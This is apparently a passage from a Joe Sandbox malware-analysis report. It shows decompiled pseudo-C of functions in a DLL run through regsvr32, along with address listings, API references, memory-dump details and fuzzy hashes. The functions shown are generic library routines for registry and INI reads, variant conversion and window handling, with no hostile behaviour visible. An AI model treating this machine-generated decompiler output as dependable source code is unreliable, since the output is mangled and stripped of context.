							return E1004763E(_t52, _t65,  *(_t87 + 0x100) ^ _t87, _t79, _t83, _t86);
						}
						if(E1001FA58(0, _t70, 0xfffffdf8, _t85, _t87, _t70, _t87, 0x100) != 0) {
							E1001FB1B(_t87 - 0x10, _t87, 1, 0xa);
							goto L12;
						} else {
							L100013E3( &(( *(_t87 - 0x10))[0xfffffffffffffff0]), _t79);
							_t52 = 0;
							goto L21;
						}
					}
				}
				L1:
				_t40 = E1000A069(0, _t67, _t80, _t85, _t95);
				goto L2;
			}




















                                                                                                                0x10037302
                                                                                                                0x10037302
                                                                                                                0x10037309
                                                                                                                0x1003730d
                                                                                                                0x10037314
                                                                                                                0x1003731a
                                                                                                                0x10037321
                                                                                                                0x10037326
                                                                                                                0x1003732c
                                                                                                                0x10037336
                                                                                                                0x10037338
                                                                                                                0x1003733b
                                                                                                                0x1003733e
                                                                                                                0x10037340
                                                                                                                0x10037347
                                                                                                                0x10037349
                                                                                                                0x1003734b
                                                                                                                0x10037352
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003735d
                                                                                                                0x10037362
                                                                                                                0x10037365
                                                                                                                0x1003736f
                                                                                                                0x10037372
                                                                                                                0x1003737f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003738a
                                                                                                                0x1003738a
                                                                                                                0x10037391
                                                                                                                0x10037394
                                                                                                                0x10037396
                                                                                                                0x100373ce
                                                                                                                0x100373ce
                                                                                                                0x100373d1
                                                                                                                0x100373eb
                                                                                                                0x100373ee
                                                                                                                0x10037401
                                                                                                                0x10037407
                                                                                                                0x10037409
                                                                                                                0x1003740b
                                                                                                                0x1003740e
                                                                                                                0x10037410
                                                                                                                0x10037415
                                                                                                                0x10037415
                                                                                                                0x1003740e
                                                                                                                0x1003741a
                                                                                                                0x1003741c
                                                                                                                0x1003741e
                                                                                                                0x10037420
                                                                                                                0x10037422
                                                                                                                0x10037422
                                                                                                                0x10037420
                                                                                                                0x100373d3
                                                                                                                0x100373de
                                                                                                                0x100373e3
                                                                                                                0x10037434
                                                                                                                0x10037438
                                                                                                                0x10037444
                                                                                                                0x1003744b
                                                                                                                0x1003744b
                                                                                                                0x1003744c
                                                                                                                0x1003744f
                                                                                                                0x10037457
                                                                                                                0x10037458
                                                                                                                0x10037459
                                                                                                                0x1003746e
                                                                                                                0x1003746e
                                                                                                                0x100373a9
                                                                                                                0x100373c9
                                                                                                                0x00000000
                                                                                                                0x100373ab
                                                                                                                0x100373b1
                                                                                                                0x100373b6
                                                                                                                0x00000000
                                                                                                                0x100373b6
                                                                                                                0x100373a9
                                                                                                                0x10037372
                                                                                                                0x10037342
                                                                                                                0x10037342
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10037321
                                                                                                                • GetDlgCtrlID.USER32 ref: 1003738B
                                                                                                                  • Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
                                                                                                                  • Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000050), ref: 10037401
                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 10037438
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3$ByteCharCtrlException@8MultiThrowWideWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1663627363-0
                                                                                                                • Opcode ID: ca537a2ef50836b29fd132a96b3a6a5ddde4d58cda0944cf2b2cdc7173693b47
                                                                                                                • Instruction ID: cde7b1fb930a4334c8d67137af01b601bac6e602a68672dd04c8859f716bedd0
                                                                                                                • Opcode Fuzzy Hash: ca537a2ef50836b29fd132a96b3a6a5ddde4d58cda0944cf2b2cdc7173693b47
                                                                                                                • Instruction Fuzzy Hash: 9941C175A0024A9FDB26DFA4CCC1BEE77E4FF04351F110A2DFA66DA2D0D770A9408A51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100261FC Relevance: 6.1, APIs: 4, Instructions: 115registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E100261FC(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t44;
				char _t45;
				CHAR* _t47;
				char _t51;
				void* _t53;
				long _t58;
				char* _t69;
				intOrPtr _t70;
				char _t79;
				CHAR* _t85;
				char _t87;
				intOrPtr _t88;
				void* _t89;
				intOrPtr _t92;
				CHAR* _t93;
				void* _t95;

				_t71 = __ecx;
				_t93 = _t95 - 0x1004;
				L1004CF80(0x1004);
				_push(0xffffffff);
				_push(0x1008fae2);
				_push( *[fs:0x0]);
				_t44 =  *0x100b9e70; // 0xbb35530
				_t45 = _t44 ^ _t93;
				_t93[0x1000] = _t45;
				_push(_t45);
				 *[fs:0x0] = _t93 - 0xc;
				_t87 = _t93[0x100c];
				_t85 = _t93[0x1018];
				_t47 = _t93[0x1010];
				_t69 = _t93[0x1014];
				 *(_t93 - 0x14) = _t87;
				 *(_t93 - 0x18) = _t85;
				 *(_t93 - 0x20) = 0;
				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
					__eflags = _t85;
					if(__eflags == 0) {
						 *(_t93 - 0x18) = 0x1009c448;
					}
					GetPrivateProfileStringA(_t47, _t69,  *(_t93 - 0x18), _t93, 0x1000,  *(_t71 + 0x68));
					_push(_t93);
					goto L12;
				} else {
					_t53 = E10025F4C(__ecx, _t47);
					_t99 = _t53;
					 *(_t93 - 0x24) = _t53;
					if(_t53 != 0) {
						L1000140B(_t93 - 0x10, E100184C0());
						_t89 = RegQueryValueExA;
						 *((intOrPtr*)(_t93 - 4)) = 0;
						 *(_t93 - 0x28) = 0;
						 *(_t93 - 0x1c) = 0;
						_t58 = RegQueryValueExA( *(_t93 - 0x24), _t69, 0, _t93 - 0x28, 0, _t93 - 0x1c);
						__eflags = _t58;
						 *(_t93 - 0x20) = _t58;
						if(_t58 == 0) {
							 *(_t93 - 0x20) = RegQueryValueExA( *(_t93 - 0x24), _t69, 0, _t93 - 0x28, L100011F4(_t93 - 0x10,  *(_t93 - 0x1c)), _t93 - 0x1c);
							E1000FED3(_t93 - 0x10, 0xffffffff);
						}
						RegCloseKey( *(_t93 - 0x24));
						__eflags =  *(_t93 - 0x20);
						_t79 =  *(_t93 - 0x14);
						if(__eflags != 0) {
							_push( *(_t93 - 0x18));
							E1000B543(_t69, _t79, _t89, 0, __eflags);
						} else {
							L100010F5(_t79, __eflags, _t93 - 0x10);
						}
						L100013E3( *((intOrPtr*)(_t93 - 0x10)) + 0xfffffff0, _t85);
						_t51 =  *(_t93 - 0x14);
					} else {
						_push( *(_t93 - 0x18));
						L12:
						E1000B543(_t69, _t87, _t87, 0, _t99);
						_t51 = _t87;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t93 - 0xc));
				_pop(_t88);
				_pop(_t92);
				_pop(_t70);
				return E1004763E(_t51, _t70, _t93[0x1000] ^ _t93, _t85, _t88, _t92);
			}























                                                                                                                0x100261fc
                                                                                                                0x100261fd
                                                                                                                0x10026209
                                                                                                                0x1002620e
                                                                                                                0x10026210
                                                                                                                0x1002621b
                                                                                                                0x1002621f
                                                                                                                0x10026224
                                                                                                                0x10026226
                                                                                                                0x1002622f
                                                                                                                0x10026233
                                                                                                                0x10026239
                                                                                                                0x1002623f
                                                                                                                0x10026245
                                                                                                                0x1002624b
                                                                                                                0x10026256
                                                                                                                0x10026259
                                                                                                                0x1002625c
                                                                                                                0x1002625f
                                                                                                                0x1002630a
                                                                                                                0x1002630c
                                                                                                                0x1002630e
                                                                                                                0x1002630e
                                                                                                                0x10026326
                                                                                                                0x1002632f
                                                                                                                0x00000000
                                                                                                                0x10026265
                                                                                                                0x10026266
                                                                                                                0x1002626b
                                                                                                                0x1002626d
                                                                                                                0x10026270
                                                                                                                0x10026283
                                                                                                                0x10026288
                                                                                                                0x1002629c
                                                                                                                0x1002629f
                                                                                                                0x100262a2
                                                                                                                0x100262a5
                                                                                                                0x100262a7
                                                                                                                0x100262a9
                                                                                                                0x100262ac
                                                                                                                0x100262ce
                                                                                                                0x100262d1
                                                                                                                0x100262d1
                                                                                                                0x100262d9
                                                                                                                0x100262df
                                                                                                                0x100262e2
                                                                                                                0x100262e5
                                                                                                                0x10026300
                                                                                                                0x10026303
                                                                                                                0x100262e7
                                                                                                                0x100262eb
                                                                                                                0x100262eb
                                                                                                                0x100262f6
                                                                                                                0x100262fb
                                                                                                                0x10026272
                                                                                                                0x10026272
                                                                                                                0x10026330
                                                                                                                0x10026332
                                                                                                                0x10026337
                                                                                                                0x10026337
                                                                                                                0x10026270
                                                                                                                0x1002633c
                                                                                                                0x10026344
                                                                                                                0x10026345
                                                                                                                0x10026346
                                                                                                                0x1002635b

                                                                                                                APIs
                                                                                                                • RegQueryValueExA.ADVAPI32 ref: 100262A5
                                                                                                                • RegQueryValueExA.ADVAPI32 ref: 100262C7
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 100262D9
                                                                                                                • GetPrivateProfileStringA.KERNEL32(?,?,?,?,00001000,?), ref: 10026326
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: QueryValue$ClosePrivateProfileString
                                                                                                                • String ID:
                                                                                                                • API String ID: 1042844925-0
                                                                                                                • Opcode ID: 7e5ca71659264342a84135f862c441e723376347e8cb3eec01237bd20aa3d418
                                                                                                                • Instruction ID: 60872dfbbed3684bb72bca17b6318999f261628bc760fed0f36e50853fce30c9
                                                                                                                • Opcode Fuzzy Hash: 7e5ca71659264342a84135f862c441e723376347e8cb3eec01237bd20aa3d418
                                                                                                                • Instruction Fuzzy Hash: D2414AB5D00199AFDF21DFA4CC81AEEBBB9FF08354F10016AF515A3290D7746A45CBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10039799 Relevance: 6.1, APIs: 4, Instructions: 107COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 61%
                                                                                                                			E10039799(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t51;
				signed int _t53;
				signed int* _t54;
				signed int _t56;
				intOrPtr _t63;
				intOrPtr* _t69;
				char* _t74;
				void* _t76;

				_push(0x20);
				E1004764D(0x10090e9b, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t76 - 0x14)) = __ecx;
				 *(_t76 - 0x10) = 0;
				E100235FF(_t76 - 0x2c);
				_t63 =  *((intOrPtr*)(_t76 + 8));
				_t69 =  *((intOrPtr*)( *((intOrPtr*)(_t76 + 0xc))));
				_t51 =  *(_t63 + 0xc) & 0x0000ffff;
				if(_t51 == 0xc ||  *_t69 == _t51) {
					L5:
					_t74 =  *((intOrPtr*)(_t63 + 0x18)) +  *((intOrPtr*)(_t76 - 0x14));
					_t53 = ( *(_t63 + 0xc) & 0x0000ffff) + 0xfffffffe;
					__eflags = _t53 - 0x13;
					if(_t53 > 0x13) {
						L21:
						 *(_t76 - 0x10) = 0x80020008;
						L22:
						_t54 =  *(_t76 + 0x10);
						 *_t54 =  *_t54 & 0x00000000;
						__eflags =  *_t54;
						L23:
						__imp__#9(_t76 - 0x2c);
						__eflags =  *(_t76 - 0x10);
						if( *(_t76 - 0x10) >= 0) {
							__eflags =  *(_t63 + 0x14);
							if(__eflags != 0) {
								E1001E397(_t76 - 0x1c, __eflags,  *((intOrPtr*)( *((intOrPtr*)(_t76 - 0x14)) + 0x1c)));
								 *(_t76 - 4) = 0;
								 *(_t63 + 0x14)();
								 *(_t76 - 4) =  *(_t76 - 4) | 0xffffffff;
								__eflags =  *(_t76 - 0x18);
								if( *(_t76 - 0x18) != 0) {
									_push( *((intOrPtr*)(_t76 - 0x1c)));
									_push(0);
									E1001D714();
								}
							}
						}
						_t56 =  *(_t76 - 0x10);
						goto L28;
					}
					switch( *((intOrPtr*)(_t53 * 4 +  &M100398CD))) {
						case 0:
							__ax =  *(__edi + 8);
							 *__esi =  *(__edi + 8);
							goto L23;
						case 1:
							L9:
							__eax =  *(__edi + 8);
							goto L10;
						case 2:
							 *__esi =  *(__edi + 8);
							goto L23;
						case 3:
							 *__esi =  *(__edi + 8);
							goto L23;
						case 4:
							__eax =  *(__edi + 8);
							 *__esi =  *(__edi + 8);
							__eax =  *(__edi + 0xc);
							__esi[1] = __eax;
							goto L23;
						case 5:
							__eax = L10020F02(__eax, __ecx, __esi,  *(__edi + 8));
							goto L23;
						case 6:
							__eflags =  *(__edi + 8);
							if( *(__edi + 8) != 0) {
								__eax =  *(__edi + 8);
								__ecx =  *__eax;
								_push(__eax);
								__eax =  *((intOrPtr*)( *__eax + 4))();
							}
							__eax = L10020F7B(__esi);
							goto L9;
						case 7:
							__eax = 0;
							__eflags =  *(__edi + 8) - __ax;
							__eax = 0 |  *(__edi + 8) != __ax;
							L10:
							 *__esi = __eax;
							goto L23;
						case 8:
							_push(__edi);
							_push(__esi);
							__imp__#10();
							__eflags = __eax;
							if(__eax == 0) {
								goto L23;
							}
							goto L22;
						case 9:
							goto L21;
						case 0xa:
							 *_t74 =  *((intOrPtr*)(_t69 + 8));
							goto L23;
					}
				} else {
					_t56 = _t76 - 0x2c;
					__imp__#12(_t56, _t69, 0, _t51);
					 *(_t76 - 0x10) = _t56;
					if(_t56 >= 0) {
						_t69 = _t76 - 0x2c;
						goto L5;
					} else {
						 *( *(_t76 + 0x10)) = 0;
						L28:
						return E10047725(_t56);
					}
				}
			}











                                                                                                                0x10039799
                                                                                                                0x100397a0
                                                                                                                0x100397a5
                                                                                                                0x100397ae
                                                                                                                0x100397b1
                                                                                                                0x100397b9
                                                                                                                0x100397bc
                                                                                                                0x100397be
                                                                                                                0x100397c6
                                                                                                                0x100397ee
                                                                                                                0x100397f5
                                                                                                                0x100397f8
                                                                                                                0x100397fb
                                                                                                                0x100397fe
                                                                                                                0x10039874
                                                                                                                0x10039874
                                                                                                                0x1003987b
                                                                                                                0x1003987b
                                                                                                                0x1003987e
                                                                                                                0x1003987e
                                                                                                                0x10039881
                                                                                                                0x10039885
                                                                                                                0x1003988d
                                                                                                                0x10039890
                                                                                                                0x10039892
                                                                                                                0x10039895
                                                                                                                0x100398a0
                                                                                                                0x100398a7
                                                                                                                0x100398aa
                                                                                                                0x100398ad
                                                                                                                0x100398b1
                                                                                                                0x100398b4
                                                                                                                0x100398b6
                                                                                                                0x100398b9
                                                                                                                0x100398ba
                                                                                                                0x100398ba
                                                                                                                0x100398b4
                                                                                                                0x10039895
                                                                                                                0x100398bf
                                                                                                                0x00000000
                                                                                                                0x100398bf
                                                                                                                0x10039800
                                                                                                                0x00000000
                                                                                                                0x1003980e
                                                                                                                0x10039812
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10039817
                                                                                                                0x10039817
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003982e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10039835
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003981e
                                                                                                                0x10039821
                                                                                                                0x10039823
                                                                                                                0x10039826
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003983d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003985d
                                                                                                                0x10039861
                                                                                                                0x10039863
                                                                                                                0x10039866
                                                                                                                0x10039868
                                                                                                                0x10039869
                                                                                                                0x10039869
                                                                                                                0x1003986d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10039844
                                                                                                                0x10039846
                                                                                                                0x1003984a
                                                                                                                0x1003981a
                                                                                                                0x1003981a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003984f
                                                                                                                0x10039850
                                                                                                                0x10039851
                                                                                                                0x10039857
                                                                                                                0x10039859
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003980a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100397cd
                                                                                                                0x100397d0
                                                                                                                0x100397d4
                                                                                                                0x100397dc
                                                                                                                0x100397df
                                                                                                                0x100397eb
                                                                                                                0x00000000
                                                                                                                0x100397e1
                                                                                                                0x100397e4
                                                                                                                0x100398c2
                                                                                                                0x100398c7
                                                                                                                0x100398c7
                                                                                                                0x100397df

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 100397A0
                                                                                                                  • Part of subcall function 100235FF: _memset.LIBCMT ref: 10023607
                                                                                                                • VariantChangeType.OLEAUT32(?,?,00000000,?), ref: 100397D4
                                                                                                                • VariantClear.OLEAUT32(?), ref: 10039885
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ChangeClearH_prolog3Type_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3387022819-0
                                                                                                                • Opcode ID: cf2714e3107d7e1b2c48b6da0e02d075f4c9bc30e63eddf9542c72dcb47014f8
                                                                                                                • Instruction ID: 1d291c353aeb479c168afaf0fded790190f171b1b478ae307407cbeaf2668271
                                                                                                                • Opcode Fuzzy Hash: cf2714e3107d7e1b2c48b6da0e02d075f4c9bc30e63eddf9542c72dcb47014f8
                                                                                                                • Instruction Fuzzy Hash: A841C534C04616DFCB12DF64C8405AEFBB5FF86312F608959E8A5AF641CB30E951DBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10043DEE Relevance: 6.1, APIs: 4, Instructions: 105COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 78%
                                                                                                                			E10043DEE(void* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct tagRECT _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t60;
				signed short _t65;
				intOrPtr _t67;
				signed int _t73;
				void* _t76;
				void* _t80;
				void* _t84;
				intOrPtr _t85;

				_t76 = __ecx;
				_v24 = 1;
				_v20 = 1;
				_push(GetStockObject(0));
				_t85 = L1000CF95(__ecx, __ecx, _t80, _t84, __eflags);
				_v16 = _t85;
				_v8 = E1001FDD8(_t76, _t80, _t85, __eflags);
				_t60 =  *(_t76 + 0x74);
				_v12 = _t85;
				if((0x0000a000 & _t60) == 0) {
					__eflags = _t60 & 0x00005000;
					if(__eflags == 0) {
						_v24 = GetSystemMetrics(0x20) - 1;
						_v20 = GetSystemMetrics(0x21) - 1;
						_t65 =  *(_t76 + 0x78);
						__eflags = 0x0000a000 & _t65;
						if((0x0000a000 & _t65) == 0) {
							L6:
							__eflags = _t65 & 0x00005000;
							if(__eflags == 0) {
								L9:
							} else {
								__eflags =  *(_t76 + 0x7c);
								if(__eflags == 0) {
									goto L9;
								} else {
									goto L8;
								}
							}
						} else {
							__eflags =  *(_t76 + 0x7c);
							if(__eflags != 0) {
								goto L6;
							}
						}
						_v12 = _v8;
					} else {
					}
				} else {
				}
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				if(_a4 != 0) {
					_v20 = 0;
					_v24 = 0;
				}
				if(( *(_t76 + 0x74) & 0x0000f000) != 0) {
					InflateRect( &_v40, 0xffffffff, 0xffffffff);
				}
				_t97 =  *(_t76 + 0x24);
				_t67 = _v8;
				if( *(_t76 + 0x24) == 0) {
					_t67 = _v16;
				}
				E1001FE7B(_t76,  *((intOrPtr*)(_t76 + 0x84)), _t76 + 0xc, 0, _t97,  &_v40, _v24, _v20, _t76 + 0xc,  *((intOrPtr*)(_t76 + 0x1c)),  *((intOrPtr*)(_t76 + 0x20)), _v12, _t67);
				asm("movsd");
				 *((intOrPtr*)(_t76 + 0x1c)) = _v24;
				asm("movsd");
				 *((intOrPtr*)(_t76 + 0x20)) = _v20;
				asm("movsd");
				_t73 = 0 | _v12 == _v8;
				asm("movsd");
				 *(_t76 + 0x24) = _t73;
				return _t73;
			}





















                                                                                                                0x10043dfc
                                                                                                                0x10043dfe
                                                                                                                0x10043e01
                                                                                                                0x10043e0a
                                                                                                                0x10043e10
                                                                                                                0x10043e12
                                                                                                                0x10043e1a
                                                                                                                0x10043e1d
                                                                                                                0x10043e20
                                                                                                                0x10043e2a
                                                                                                                0x10043e31
                                                                                                                0x10043e35
                                                                                                                0x10043e49
                                                                                                                0x10043e4f
                                                                                                                0x10043e52
                                                                                                                0x10043e55
                                                                                                                0x10043e57
                                                                                                                0x10043e5f
                                                                                                                0x10043e5f
                                                                                                                0x10043e63
                                                                                                                0x10043e70
                                                                                                                0x10043e65
                                                                                                                0x10043e65
                                                                                                                0x10043e69
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10043e69
                                                                                                                0x10043e59
                                                                                                                0x10043e59
                                                                                                                0x10043e5d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10043e5d
                                                                                                                0x10043e76
                                                                                                                0x10043e37
                                                                                                                0x10043e37
                                                                                                                0x10043e2c
                                                                                                                0x10043e2c
                                                                                                                0x10043e7c
                                                                                                                0x10043e7d
                                                                                                                0x10043e7e
                                                                                                                0x10043e7f
                                                                                                                0x10043e85
                                                                                                                0x10043e87
                                                                                                                0x10043e8a
                                                                                                                0x10043e8a
                                                                                                                0x10043e93
                                                                                                                0x10043e9d
                                                                                                                0x10043e9d
                                                                                                                0x10043ea3
                                                                                                                0x10043ea6
                                                                                                                0x10043ea9
                                                                                                                0x10043eab
                                                                                                                0x10043eab
                                                                                                                0x10043ecc
                                                                                                                0x10043eda
                                                                                                                0x10043edb
                                                                                                                0x10043ee1
                                                                                                                0x10043ee2
                                                                                                                0x10043eea
                                                                                                                0x10043eeb
                                                                                                                0x10043eee
                                                                                                                0x10043ef1
                                                                                                                0x10043ef6

                                                                                                                APIs
                                                                                                                • GetStockObject.GDI32(00000000), ref: 10043E04
                                                                                                                  • Part of subcall function 1001FDD8: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 1001FE1E
                                                                                                                  • Part of subcall function 1001FDD8: CreatePatternBrush.GDI32(00000000), ref: 1001FE2B
                                                                                                                  • Part of subcall function 1001FDD8: DeleteObject.GDI32(00000000), ref: 1001FE37
                                                                                                                • InflateRect.USER32 ref: 10043E9D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateObject$BitmapBrushDeleteInflatePatternRectStock
                                                                                                                • String ID:
                                                                                                                • API String ID: 3923860780-0
                                                                                                                • Opcode ID: 77cdc2866bb3220ef96dfcc24128b45254a2059c46a14f052eb33bb8f99a918e
                                                                                                                • Instruction ID: 83c43c8af36dfc2abb3a7d6ee453c06656e2c6b27577534a316298b645387d5a
                                                                                                                • Opcode Fuzzy Hash: 77cdc2866bb3220ef96dfcc24128b45254a2059c46a14f052eb33bb8f99a918e
                                                                                                                • Instruction Fuzzy Hash: 10411471D012199BDF41DFA5C980AAE7BF5EF08350F2142A5ED10EB296D370AE41CB94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10017EC9 Relevance: 6.1, APIs: 4, Instructions: 103windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E10017EC9(void* __ecx, struct HWND__** _a4) {
				struct HWND__** _v8;
				struct HWND__** _v12;
				long _t31;
				struct HWND__** _t32;
				struct HWND__** _t44;
				struct HWND__** _t45;
				long _t47;
				void* _t49;
				struct HWND__** _t63;

				_push(__ecx);
				_push(__ecx);
				_t49 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
					_t31 = _a4;
					if(_t31 != 0) {
						if( *((intOrPtr*)(_t31 + 8)) == 0) {
							L4:
